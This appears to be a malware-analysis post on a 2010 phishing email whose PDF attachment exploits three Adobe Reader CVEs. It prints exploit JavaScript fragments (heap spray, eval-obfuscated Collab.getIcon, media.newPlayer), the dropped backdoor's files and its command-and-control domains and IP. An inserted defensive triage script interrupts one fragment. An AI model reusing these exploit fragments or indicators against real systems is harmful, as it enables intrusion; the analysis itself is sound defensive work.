Download 350924123cbf1b126f4e38335ed6660d + files dropped as a password-protected archive (contact me if you need the password)
-----Original Message-----
From: 94255015 [mailto:94255015@nccu.edu.tw]
Sent: Tuesday, August 03, 2010 11:24 AM
To: xxxxxxxxx
Subject: Please confirm~
Dear xxxxxxxxxxxxxxxx:
I'm very sorry to bother you, but please make sure you have attended the meetings, and confirm that the agenda is correct. Thank you very much!
Yours sincerely,
Aaron
Headers
Received: (qmail 6491 invoked from network); 3 Aug 2010 15:08:01 -0000
Received: from alumni2.nccu.edu.tw (HELO alumni2.nccu.edu.tw) (140.119.166.13)
by xxxxxxxxxxxx
Received: By OpenMail Mailer;Tue, 03 Aug 2010 23:24:24 +0800 (CST)
From: "94255015" <94255015@nccu.edu.tw>
Reply-To: 94255015@nccu.edu.tw
Subject: Please confirm~
Message-ID: <1280849064.24992.94255015@nccu.edu.tw>
To: "xxxxxxxxx
Date: Tue, 3 Aug 2010 23:24:24 +0800
MIME-Version: 1.0
Return-Path: 94255015@nccu.edu.tw
Content-Type: multipart/mixed; boundary="---=Z8PIZ9?YwlMVFpoZJ2WvJ=sMbD"
140.119.166.13
Hostname: alumni2.nccu.edu.tw
ISP: MOEC
Organization: National Chengchi University
Proxy: None detected
Type: Broadband
Country: Taiwan
File name: conference_program.pdf
http://www.virustotal.com/file-scan/report.html?id=220a1b24e02c2757eccebb6827b4021d570b0f662dd1b0772c22c96b8f6b7c1d-1282772703
Submission date:
2010-08-25 21:45:03 (UTC)
Current status:
17/42 (40.5%)
Authentium 5.2.0.5 2010.08.25 PDF/Obfusc.G!Camelot
Avast 4.8.1351.0 2010.08.25 JS:Pdfka-gen
Avast5 5.0.594.0 2010.08.25 JS:Pdfka-gen
BitDefender 7.2 2010.08.25 Exploit.PDF-JS.Gen
ClamAV 0.96.2.0-git 2010.08.25 Heuristics.PDF.ObfuscatedNameObject
DrWeb 5.0.2.03300 2010.08.25 Exploit.PDF.1302
Emsisoft 5.0.0.37 2010.08.25 HTML.Malicious!IK
eSafe 7.0.17.0 2010.08.25 PDF.Exploit.4
F-Prot 4.6.1.107 2010.08.25 JS/ShellCode.S
F-Secure 9.0.15370.0 2010.08.25 Exploit.PDF-JS.Gen
GData 21 2010.08.25 Exploit.PDF-JS.Gen
Ikarus T3.1.1.88.0 2010.08.25 HTML.Malicious
Kaspersky 7.0.0.125 2010.08.25 Exploit.JS.Pdfka.cri
nProtect 2010-08-25.02 2010.08.25 Exploit.PDF-Name.Gen
VBA32 3.12.14.0 2010.08.25 Exploit.JS.Pdfka.cri
MD5 : 350924123cbf1b126f4e38335ed6660d
CVE-2009-0927 + CVE-2009-4324 + CVE-2007-5659
____________________________________
CVE-2009-0927
for (i = 0; i < buffersize; i++) {
    buffer[i] = unescape("%0a%0a%0a%0a");
}
var strtmp3 = "Collab.get" + "Icon(buffer+'_N.bundle');";
eval(strtmp3);
---------------------------------------------------------
CVE-2009-4324
for (i = 0; i < 200; i++) memory[i] = block + shellcode;
try {
    this.media.newPlayer(null);
}
catch (e) {
}
util.printd(String.fromCharCode(2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570,
    2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570,
    2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570), new Date());
}
----------------------------------------------------------------------
CVE-2007-5659
if (app.viewerVersion >= 6.0) {
    this.collabStore = Collab.collectEmailInfo({
        subj : "", msg : plin
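As an added example (not code from the original post), a small triage script that inflates a PDF's FlateDecode streams and flags the Reader JavaScript calls quoted in the three fragments above, after undoing the `"Collab.get" + "Icon"` string split; the PDF it builds is a constructed, inert test input, not the dropped sample.

```python
import re
import zlib

# Reader JavaScript calls quoted in the three exploit fragments on this
# page, mapped to the CVE the page lists each one under.
SUSPICIOUS_CALLS = {
    "Collab.getIcon": "CVE-2009-0927",
    "media.newPlayer": "CVE-2009-4324",
    "util.printd": "CVE-2009-4324",
    "Collab.collectEmailInfo": "CVE-2007-5659",
}
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\nendstream", re.DOTALL)
# Matches the '" + "' seam of a split string such as "Collab.get" + "Icon".
SPLIT_STRING_RE = re.compile(r'"\s*\+\s*"')

def extract_streams(pdf_bytes):
    """Return every stream body, inflated when it is zlib (FlateDecode) data."""
    bodies = []
    for m in STREAM_RE.finditer(pdf_bytes):
        raw = m.group(1)
        try:
            bodies.append(zlib.decompress(raw))
        except zlib.error:
            bodies.append(raw)  # not compressed: scan the raw bytes
    return bodies

def triage_pdf(pdf_bytes):
    """Return sorted findings, e.g. ['Collab.getIcon (CVE-2009-0927)', ...]."""
    findings = set()
    for body in extract_streams(pdf_bytes):
        text = body.decode("latin-1")
        joined = SPLIT_STRING_RE.sub("", text)  # undo string splitting
        if joined != text:
            findings.add("split-string obfuscation")
        if "eval(" in joined:
            findings.add("eval present")
        for call, cve in SUSPICIOUS_CALLS.items():
            if call in joined:
                findings.add(f"{call} ({cve})")
    return sorted(findings)

def build_sample_pdf():
    """Constructed, inert input: a FlateDecode JS stream mimicking the page's fragments."""
    js = (b'var s = "Collab.get" + "Icon(buffer);"; eval(s);\n'
          b'try { this.media.newPlayer(null); } catch (e) {}\n')
    body = zlib.compress(js)
    return (b"%PDF-1.4\n1 0 obj << /Filter /FlateDecode /Length "
            + str(len(body)).encode() + b" >>\nstream\n" + body
            + b"\nendstream\nendobj\n%%EOF\n")
```

On a real sample, run `triage_pdf(open(path, "rb").read())`; streams using filters other than FlateDecode are scanned raw and may need a fuller PDF parser.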
Wepawet
http://wepawet.iseclab.org/view.php?hash=350924123cbf1b126f4e38335ed6660d&type=js
---------------------
Windows XP SP2 Adobe Reader 9.11
Created files
%userprofile%\Application Data\diskchk.exe 379E0B3E2C4778075511C4C1E62C0C65
%userprofile%\Local Settings\Temp\2.tmp
C:\a.pdf
File name: diskchk.exe
http://www.virustotal.com/file-scan/report.html?id=5ab0bc8ef4f276e2b8a8fa989aa8e35947f1f1a2694f786ab02d4d4b7eeab2d6-1282823469
Submission date:
2010-08-26 11:51:09 (UTC)
Result:
10/40 (25.0%)
AntiVir 8.2.4.46 2010.08.26 TR/Crypt.ZPACK.Gen
Avast 4.8.1351.0 2010.08.26 Win32:Malware-gen
Avast5 5.0.594.0 2010.08.26 Win32:Malware-gen
AVG 9.0.0.851 2010.08.26 BackDoor.Generic12.BUOQ
BitDefender 7.2 2010.08.26 Gen:Trojan.Heur.RP.bu0@a86LzSfb
CAT-QuickHeal 11.00 2010.08.24 (Suspicious) - DNAScan
F-Secure 9.0.15370.0 2010.08.26 Gen:Trojan.Heur.RP.bu0@a86LzSfb
GData 21 2010.08.26 Gen:Trojan.Heur.RP.bu0@a86LzSfb
nProtect 2010-08-26.01 2010.08.26 Trojan/W32.Agent.28160.MA
Sophos 4.56.0 2010.08.26 Troj/FkIntel-A
MD5 : 379e0b3e2c4778075511c4c1e62c0c65
http://anubis.iseclab.org/?action=result&task_id=1f9a7a78ebc252b74a1362b81134726d7
DNS
audnted.flinkup.org 220.246.73.187
facecache.mypicture.info 220.246.73.187
microinfo.3utilities.com 255.255.255.255 220.246.73.187
http://www.robtex.com/ip/220.246.73.187.html#whois
Hostname: 187.73.246.220.static.netvigator.com
ISP: PCCW Limited
Organization: PCCW Limited
Type: Broadband
Assignment: Dynamic IP
Country: Hong Kong
City: Kings Park
http://www.robtex.com/dns/187.73.246.220.static.netvigator.com.html#graph